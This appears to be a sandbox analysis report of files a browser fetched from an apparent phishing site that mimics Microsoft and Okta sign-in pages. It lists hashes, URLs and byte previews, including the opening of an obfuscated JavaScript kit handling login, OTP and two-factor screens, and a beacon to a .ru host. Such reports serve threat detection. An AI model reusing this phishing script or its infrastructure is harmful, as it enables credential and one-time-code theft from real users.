                                                              Preview:.PNG........IHDR......./.............sRGB....... .IDATx^.].XSI.=. M....T.`...X......}.]..}...e.k..{.(*V...`...o&..)i/......H2s..s.yo..Xa.0.......C@.....2f.C.!..`.0...`D..!..`.0..."F......Lc.0.......#z..............^..W......vEa..(R...W.o.J.km..k`.e.2.......`D.7.Z.w..!n......T....@..M.GO.892?+.....`.0...#...4..]n....{.Z....b...h..l.,...B.5b.0...........Vs......T...r.Wy...(..Gg..r....>&$.S.G.D.......]...I..S.....v.....9S.!..`.......F.'y3g...]+.fai.....T.....).%!.....{.7.u}}+a..p(X..]!...C.!.....l....W.Y..=[..K.wt...v....mD.5...ii....W.....z*#..0......D.....FV.w..,.T..............X.|..|.Let....F.d.W.Q.!..`....l...Wg..~.6./^..A.w..nE.}..`ff...S..p..>..!C.")).O.>E...9../?..+.b..H."p-R.N..X.h..&.!..`.h..6X...... ..33s..;Y...9u....c.w#..[^.suu...;%....W/.vymX<.2...`.0.4G....bx....C.vr+.5.I...h............8.".q...|v...[/....C.jUY\..9.!..`......5.t..K...-.R.4h....i..[\.N...<y,0j.l...G.z..7....H....e..y..R.N..(\.(....[.RSR..........w.......x.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                              Category:dropped
                                                              Size (bytes):61
                                                              Entropy (8bit):3.990210155325004
                                                              Encrypted:false
                                                              SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                              MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                              SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                              SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                              SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
                                                              Category:downloaded
                                                              Size (bytes):1400
                                                              Entropy (8bit):7.808470583085035
                                                              Encrypted:false
                                                              SSDEEP:24:rIcdIg4GFKiUqLRfqX5Cbg2tRSpGHM0RMrB6nzU9Jd28VVdYfWZG0rrZgqhpT:rHUZGRNEoSpGHMTrB6zUXdNVSi1b
                                                              MD5:333EE830E5AB72C41DD9126A27B4D878
                                                              SHA1:12D8D66EBB3076F3D6069E133C3212F97C8774E1
                                                              SHA-256:8702292CBC365E9F0488143E2B309B85EFE09C61FD2E0A2E21C53735A309313C
                                                              SHA-512:3413ED624241877C1D44FEE23FD37745CB214C12AE73FACFAFA07B47FA1CB9E5DAA3CB7F542564E04075FFE8BA744C962FBDD78F08A643A90C0EC1118C05BBF8
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://vkwek.ckyucle.com/ijGLf8KcAmo8F8uFMIwMKt5jWtydfJOdOqrh5153ZvUBo56RjXXwgHIOxu3KbwiSDyz230
                                                              Preview:.PNG........IHDR...l................?IDAThC.X.n.A..K.. ..H8.....7P..p...&......>..4.'.y.`$Z...$1..9..;...w.|...zvvv.............b..Y....B...Dq..&\....pe..r.X.P...3.n...M.j.....+..r}}.t:...fa.mmm5U........)dwww...j...q<<<<L.}ggg.......k.O.?....^.gE.6....B..%U..w#H...y....~......h.....Q.E;.....T...E.W..X=..{.;..+.. ..`.(:2...A.*.U.....Y....z..l.r.S..<K...x.E.... .....U.,.`.....<::............MSiE.2w.!z.T...PWl.).0...Z....Z.'~.5zP.o..-. ......q..x..w.....y......5|v..i...........@w.c...j..3....w,/.3.).....u.......b.}..R........ `.*.....`mH$.U..B.H1...jx..3..$k ...........Z......4....A.>..X.a/...0N.&?q..........F#w&o."L:...l.c...x.P...@e..&.&|Y...!.i....gac..1C.....I..t...e~q.&.6.2B.}.*V.p.B.."...'..M..s.s.....V%-.?8yC.?m......z...&]\.VN.s....j.`....kY.....64.Y..(_ea[.r...1B.......5....i.u.......aQ.+z.x.......<,~..a...z,.I.T.b.P.^.`...y.58..,|Q...u.-.._....m.1...|k.j.7.,x.....X....ez..a....X...\E.$..-...s.../.9L.9*.(9..U...x$#.C...Nm...p.....J...
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                              Category:dropped
                                                              Size (bytes):231
                                                              Entropy (8bit):6.725074433303473
                                                              Encrypted:false
                                                              SSDEEP:6:6v/lhPZsRtsa9hC0bKDHv5Ef30XY4qMa3IE6Aleup:6v/76eAhbSHusYX4E3
                                                              MD5:547988BAC5584B4608466D761E16F370
                                                              SHA1:C11BB71049702528402A31027F200184910A7E23
                                                              SHA-256:70E32B2DB3F079BB0295A85A0DB15ED9E5926294DD947938D6CFA595F5AB18B4
                                                              SHA-512:C4A76F6E94982D1CC02C2B67523A334E76BFDE525C1014D32DB9E7ECA0FA39A06F291ECFA94C8C6A49D488EA3ACF9C10DDF3CAD9515562010440863D0F08FBA3
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:.PNG........IHDR..............w=.....sRGB.........IDATHK...1...Z......... #$#..-.. $$3..H...q.x.>.x..yY.|.@h.......$.B/..*Ec...J.}.....Rl..^.......#-...f.6p.cJigf...G.<.!.z..>a.+j....&U.....E/.._.`.d...~_....7...4`....IEND.B`.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines (1476), with CRLF line terminators
                                                              Category:downloaded
                                                              Size (bytes):38284
                                                              Entropy (8bit):5.112021368539161
                                                              Encrypted:false
                                                              SSDEEP:192:loogIexLQ5WKTCFBwCIZtJ8FtX2+UBRkfeWcrScuH9Ye3YdersR8Q5oqWjftogxp:2DKAaZtJs5odwthx5P6mqjDggJkLLn
                                                              MD5:EA3C880120D132DD7E69D07025F11CF3
                                                              SHA1:466C053FBCC498C1B6D5D57704E579C017EB34B4
                                                              SHA-256:B8FE053E02EE76DF190025778161DDCDF3C7DD888A1432C020842C1F08D77646
                                                              SHA-512:F44047DA2C8FD10F7408B1C95EFA8051FC7C3C8FBEBE1AE4AE0E2BF44F720EF7AFCEC6468809894AC8D542D28AD842651B17E277D0EB343776B0D8DBBD6C5C30
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://vkwek.ckyucle.com/xy12R7tzrssHzef25
                                                              Preview:@font-face{font-family: 'gdsherpa';font-weight: 700;src: url('/testweb/assets/fonts/GDSherpa-bold.woff2') format('woff2'),url('/testweb/assets/fonts/GDSherpa-bold.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 400;src: url('/testweb/assets/fonts/GDSherpa-regular.woff2') format('woff2'),url('/testweb/assets/fonts/GDSherpa-regular.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 1 999;src: url('/testweb/assets/fonts/GDSherpa-vf.woff2') format('woff2'),url('/testweb/assets/fonts/GDSherpa-vf.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 1 900;src: url('/testweb/assets/fonts/GDSherpa-vf2.woff2') format('woff2'),url('/testweb/assets/fonts/GDSherpa-vf2.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gd-sage';font-weight:
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines (45667)
                                                              Category:downloaded
                                                              Size (bytes):45806
                                                              Entropy (8bit):5.207605835316031
                                                              Encrypted:false
                                                              SSDEEP:384:1ZS0CCnasl8gRR/PoPez+iCMN0Fkiw2Jh4RWdRGhAjbp2ChPL8cYRGv5MRUK6np9:/CCnVl7tUkBxkdRGOfDiY5C5MAn5GY2
                                                              MD5:80F5B8C6A9EEAC15DE93E5A112036A06
                                                              SHA1:F7174635137D37581B11937FC90E9CB325077BCE
                                                              SHA-256:0401DE33701F1CAD16ECF952899D23990B6437D0A5B7335524EDF6BDFB932542
                                                              SHA-512:B976A5F02202439D94C6817D037C813FA1945C6BB93762284D97FF61718C5B833402F372562034663A467FDBAA46990DE24CB1E356392340E64D034E4BA1B4E4
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://cdn.socket.io/4.6.0/socket.io.min.js
                                                              Preview:/*!. * Socket.IO v4.6.0. * (c) 2014-2023 Guillermo Rauch. * Released under the MIT License.. */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).io=e()}(this,(function(){"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(e)}function e(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function n(t,e){for(var n=0;n<e.length;n++){var r=e[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(t,r.key,r)}}function r(t,e,r){return e&&n(t.prototype,e),r&&n(t,r),Object.defineProperty(t,"prototype",{writable:!1}),t}function i(){return i=Object.assign?Object.assign.bind():function(t){for(var e=
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:SVG Scalable Vector Graphics image
                                                              Category:dropped
                                                              Size (bytes):7390
                                                              Entropy (8bit):4.02755241095864
                                                              Encrypted:false
                                                              SSDEEP:192:cdEMK4RwidEMK4Rwbwm6xiD7x9m9t6EQ3FabrItDWOO6DcA:cdEMVwidEMVwbwtxiDHmP6lFeItDWOOc
                                                              MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                              SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                              SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                              SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:PNG image data, 79 x 26, 8-bit/color RGB, non-interlaced
                                                              Category:dropped
                                                              Size (bytes):61
                                                              Entropy (8bit):4.035372245524405
                                                              Encrypted:false
                                                              SSDEEP:3:yionv//thPl6lt/GwU/6yxl/k4E08up:6v/lhPWut7Tp
                                                              MD5:5971D9CF0BF237BEFAB32D2ED5822527
                                                              SHA1:E778F9CF67DBA3AA352D69BA263B9D2C234DEA2E
                                                              SHA-256:A32010BFC8FCC727DCEF23104D12A4B8C1B5978D828AA096EB0C986F5E22AD19
                                                              SHA-512:A094C1E693DD191BA1F311A4E7978377DFC6ECFB32004741ADEF8A358B586B92999FED5F70E81C67DD34AC281ED784FD7FE72DF567B1B4F05D4044DAEE33A0BD
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:.PNG........IHDR...O.........y.......IDAT.....$.....IEND.B`.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:SVG Scalable Vector Graphics image
                                                              Category:downloaded
                                                              Size (bytes):1864
                                                              Entropy (8bit):5.222032823730197
                                                              Encrypted:false
                                                              SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                              MD5:BC3D32A696895F78C19DF6C717586A5D
                                                              SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                              SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                              SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://vkwek.ckyucle.com/mnV1lfGeFEBrSZF3tuYYejMClYOTm2XI5H6CdAfkleMiUWyqFdfMgv4x5mkyLwx220
                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 120x120, segment length 16, baseline, precision 8, 304x72, components 3
                                                              Category:downloaded
                                                              Size (bytes):7753
                                                              Entropy (8bit):7.864559662478736
                                                              Encrypted:false
                                                              SSDEEP:192:cf1O6DPQvGB9DAfidLz/goy8MM8ZX6UuIrovzTOjCTz:6PQeB9DTVBWZXz6OW
                                                              MD5:477E4BA2BBA822F5B904CA9A9153DE5A
                                                              SHA1:5B3800C99BC7E045D8BB6BFF90770CBFF16BECAF
                                                              SHA-256:C1E6AD95A24330D67C7946807EF843616E8E701D3FA5A3321FC55406F048FD2D
                                                              SHA-512:031EE282127805856BDA35F4BDE71109F414117BE84E98332E77C55C5F601124AA1C0C73CD26246415466527403169463F6926CE1E18386730EA2558395C46DF
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://aadcdn.msauthimages.net/c1c6b6c8-d3sb-qm-hhdue0tq8clcu1b-m7tqgv0uyzh6-ekjzwq/logintenantbranding/0/bannerlogo?ts=637292763121529380
                                                              Preview:......JFIF.....x.x.....C....................................................................C.......................................................................H.0.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..."....:^.5..{ogk..%...G.j:.1..s\M.....V|M...m...r..p...S.U.H.vz..G.^l>>|.'.J.........._.R|3.........cS.Y>..#..K.++E...h.j...k.XJXGsm .7*.X.88 .... ..'...O.}.G2.h.w..P..T9......M."..3z..>.d................?.*..]......g.......U......#...c../.\....k>......7.e.cwyor...F...s.b.....G..E#.?.1.....T..I......U........t..x.Xe..GB2.H.. .Y.!.?.|%....mj.H..Q..^."F..B.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:PNG image data, 2160 x 443, 8-bit/color RGBA, non-interlaced
                                                              Category:dropped
                                                              Size (bytes):49602
                                                              Entropy (8bit):7.881935507115631
                                                              Encrypted:false
                                                              SSDEEP:768:eKE36up1D3cLJg7zmjprNBQqJCoklwCeFrpKZ00PIwoftXEsQsV1kZ8IHml446Xe:KqupJ9+aqyqCz+0ALcmDIHnjL2p
                                                              MD5:DB783743CD246FF4D77F4A3694285989
                                                              SHA1:B9466716904457641B7831868B47162D8D378D41
                                                              SHA-256:5913B1EC0FC58AB2BEC576804B9E9B566A584EA3D21A1BF74A7B40051A447FDC
                                                              SHA-512:E6F36C52996B6BF8B07C7A102DEF2D555A1D35FA12F1A2016EDD8F3C86C33DD3545513B436AB6B4EF1D1CAD8A5CA5D352BA587EEE605638640B258C3976D9033
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:.PNG........IHDR...p..........{......sBIT....|.d.....pHYs..;...;...3.+....tEXtSoftware.www.inkscape.org..<... .IDATx...w.]U....L.I(!.B..J..R....PD.z-.(...4Q..*MQ. .(..EE.AP:.....HI.... ....ur3..r.Y.|....z..3.2.g..{..Y.V..6.u...U...Q.Z.X......m..........^......O.^l......Y.)`|...:......x.:."0r...H.W.....,.......j.....L%]s../4.>.<.........S.$I.$I.$I.T....*.(`s`S`.`C`mR..J...6.x.x.x..z9.......g..j}R...h.1.t]=....n..#.f.I.$I.$I.$I%c.G.. 5il.l.lCj.(S.F;.....7...AZ.@*B....%.E....C.be3..K....S."CI.$I.$I.$I...jV.v.v.v$5l..M.ysI......x{/i...Y...o..m.......v.6.>R..$I.$I.$I.......F.{..6v!...1{.Y..9ng...S..TF.I..;.o&5A.....&.w....$5J..M$I.$I.$I.$.........Q;..IQ...9n.nl.Z.e.......j.`hd..{..=p-p=n."I.$I.$I.$eg.G...........8...i......b. [.{.V.........V...96GI.$I.$I.$IY...c ..R...Q.q..,..........Gm........X=6NW......clp.I.$I.$I.$IZ*..g...s...c...F.A.<z*.Q.a...+.?....8.Xn.GO.$I.$I.$I..,O.l....@.....z.....R..a$.:...I.yb-....l....$I.$I.$I.$.....$.'S..j.p..3NBGX..M.3.?.......p$I.$
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:PNG image data, 2446 x 899, 8-bit/color RGBA, non-interlaced
                                                              Category:downloaded
                                                              Size (bytes):70712
                                                              Entropy (8bit):6.94130504124589
                                                              Encrypted:false
                                                              SSDEEP:768:lBgPNoDCQcgEBtp8Y/fYous0+W/+hVNpTrP19NhgtJ+6qcHaDCzGoSRug:lBgC+Qoju/szW/SNDaJ+6qc6DESR5
                                                              MD5:F70FF06D19498D80B130EC78176FD3FF
                                                              SHA1:9D8A3B74C5164FF7AE2C7930B6D7B14707B404FC
                                                              SHA-256:DF6DBAB5251E56B405E48AAF57D3CD4188F073FFBA71131FA6CD26E6742923AE
                                                              SHA-512:543151693C3751A7E6B1B6A9EA77B83CFD049BC320EE75B666514076F4C0218E9DC23DA5E6C932B2B8670AA1BE1D4E9A91A889F5C6F0D7B9F9C9FE6694609B31
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://vkwek.ckyucle.com/uvjwVVwGEKsrxbM6oO2WNguxpWDZE767qA3s6RHiwTp8DGWBbz5E0shyuHrSHEhUngh253
                                                              Preview:.PNG........IHDR................... .IDATx....q......!8.on.....{....4{..{U.A!x...t3P.~.S86...N....7USM....p.".?..>.G....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @.......
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=14, height=1987, bps=182, compression=LZW, PhotometricIntepretation=CMYK, orientation=upper-left, width=3579], baseline, precision 8, 1920x1066, components 3
                                                              Category:dropped
                                                              Size (bytes):290799
                                                              Entropy (8bit):7.922187397264848
                                                              Encrypted:false
                                                              SSDEEP:6144:8Rmsv1pF1LB8kniKes9YNy/FnW5sfFY538IEvm8P2YUFcybnYM0aXJ:8Lyknijs9E0isfm5Eu8P2nFcybnSgJ
                                                              MD5:A9D9B1AA463974CFAB7C2253553852F1
                                                              SHA1:06D9BF34AA776506420CB8FA9E26B522281725FE
                                                              SHA-256:794C5FB600D060BD0B30BB54F10CEF9AFD4718F600DE2DB9E2D2472BF4AE906B
                                                              SHA-512:251200FA21EE687862347CE576FEB89B106AE48E34928766D63017A436D5F6275D0AEA752F4B16393A7FB57D67E1A14F6F9550E21F6054136F88F1F16FD844E2
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:......JFIF.....,.,......Exif..II*...............................................................................................................................(...........1...........2...........i...........,.............,.......,.......Adobe Photoshop CS3 Windows.2017:07:21 10:36:18...................................*...............................z...............(.......................................H.......H.............JFIF.....,.,.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......Y....".......................................A.........................!1A..Q"2aq.B..#345Rrs.....Cb......6DS................................&........................!1"2.#3AqQa.............?.m.r.....8.......0..1..C.<b...I...(........h$.T..D..qQ6.<...OJa.$.3.qG.ZO..4l...85D.........aU...B.A......^.( w.G.|%7.5=.tv...(.......Y5..w...|......... V...4....O..A5.,.)s..6.....t. ..S....N.{.o...@Q..V....b.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                              Category:downloaded
                                                              Size (bytes):103933
                                                              Entropy (8bit):5.201385561091186
                                                              Encrypted:false
                                                              SSDEEP:3072:0CsKfdROH2DgBCO2acT8OcUa623RQs9UxIO:+S3IO
                                                              MD5:7BCC10882A3FEE621FCD4FF3CCE42AFA
                                                              SHA1:EDD5F4E27DB9BCA62499172114C24ED4E634E2C4
                                                              SHA-256:DB1F4FBD04BA255DDE2485CDA40B918F8286AD166F43BF7F1388EC7E7E52F1DD
                                                              SHA-512:77BE919702CDAF6184C00E90439FD5A1A40D2F8FCB9FF26983FF43995B4585EB24BFE130BBDC372D8233BFC17F21F39168683BC18AD4B0B6ACEC8EDF6B3A00A4
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://vkwek.ckyucle.com/56NViOjdyBE66K4aemhQsnnijWU2q89KCdOOZ89106
                                                              Preview:const _0x41ffed=_0x1609;function _0x36cc(){const _0x47dfa8=['name','onclick','multbackbtnclick','input-group','style','callotp','yahoo.com','display','otp\x20sent','autocomplete','duplicate\x20request','iProofEmailEntry','1329408KUShDZ','authappimg','backbtnid','otp\x20sent\x20error','section_otp','dirltr','span','backgroundImage','includes','error_verifyemail','backbtnclick','error-inp','head','selecttwofamethod(this)','.bannerlogo','Forgot\x20my\x20password','assertive','loading','try_again_otp','fail','section_authapp','#section_uname_content','section_signinanothererror','removeAttribute','a_text','app','section_uname','hide-to-left\x200.5s','button','</label>\x0a\x20\x20\x20\x20\x20\x20</div>\x0a\x20\x20\x20\x20\x20\x20<div\x20class=\x22phcontainer\x22\x20id=\x22iProofPhoneEntry\x22\x20style=\x22display:\x20none;\x22\x20aria-hidden=\x22true\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20<label\x20id=\x22iProofPhoneHint\x22\x20for=\x22iProofPhone\x22\x20class=\x22form-group-top\x22\x20ari
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines (10450)
                                                              Category:downloaded
                                                              Size (bytes):10498
                                                              Entropy (8bit):5.327380141461276
                                                              Encrypted:false
                                                              SSDEEP:192:x9iW+rIadfLTcaTO5BrwjnwSrQ1kPmqQmMjmtmumobU8:x9KVLbw6jqON
                                                              MD5:E0D37A504604EF874BAD26435D62011F
                                                              SHA1:4301F0D2B729AE22ADECE657D79ECCAA25F429B1
                                                              SHA-256:C39FF65E2A102E644EB0BF2E31D2BAD3D18F7AFB25B3B9BA7A4D46263A711179
                                                              SHA-512:EF838FD58E0D12596726894AB9418C1FBE31833C187C3323EBFD432970EB1593363513F12114E78E008012CDEF15B504D603AFE4BB10AE5C47674045ACC5221E
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css
                                                              Preview:a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,ol,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,th,thead,tr,tt,u,ul,var{background:transparent;border:0;font-size:100%;font:inherit;margin:0;outline:0;padding:0;vertical-align:baseline}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:"";content:none}:focus{outline:0}ins{text-decoration:none}del{text-decoration:line-through}table{border-collapse:collapse;border-spacing:0}input[type=hidden]{display:none!important}input[type=checkbox],input[type=radio]{border:0!important;margin:0;padding:0}@font-face{font-family:Proxima Nova;font-style:normal;font-weight:400;src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot);src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot?#iefix) fo
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:SVG Scalable Vector Graphics image
                                                              Category:dropped
                                                              Size (bytes):268
                                                              Entropy (8bit):5.111190711619041
                                                              Encrypted:false
                                                              SSDEEP:6:tI9mc4slztdbC/yXqRRnYdbyJA0xy+LUxh7JECWWNAc:t4pb8WuEbaA0xVUxh1ECgc
                                                              MD5:59759B80E24A89C8CD029B14700E646D
                                                              SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                              SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                              SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:very short file (no magic)
                                                              Category:downloaded
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:V:V
                                                              MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                              SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                              SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                              SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                              Malicious:false
                                                              Reputation:low
                                                              URL:https://nzd92.6gniu68.ru/5575968202461485388865565DuGzcrTyOZLFNLDIYSVXZDPOLLDSEDNQMSF
                                                              Preview:0
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:PNG image data, 506 x 303, 8-bit/color RGBA, non-interlaced
                                                              Category:dropped
                                                              Size (bytes):29796
                                                              Entropy (8bit):7.980058333789969
                                                              Encrypted:false
                                                              SSDEEP:768:uEV6Q9wDBC1MNazNsMYCUPwRGMSU6Ub1W:uKpiOZ7YCpRRXk
                                                              MD5:210433A8774859368F3A7B86D125A2A7
                                                              SHA1:408BACDDC39F12CAD285579C102FE4A629862D88
                                                              SHA-256:9C6ADDFC339CE1C1D262290AB4CC2DE8D38D4B54B11A8E85AFD44FBB0ACC2561
                                                              SHA-512:6CBF6492BBA0734ECE1B595743B7A251D3C98425A36D5BF87EBFAD17BE979A23ADEE556FB074EF6D284052F6412ACEDA4E179FB7DFA0BA1103610CC01113A1A3
                                                              Malicious:false
                                                              Reputation:low
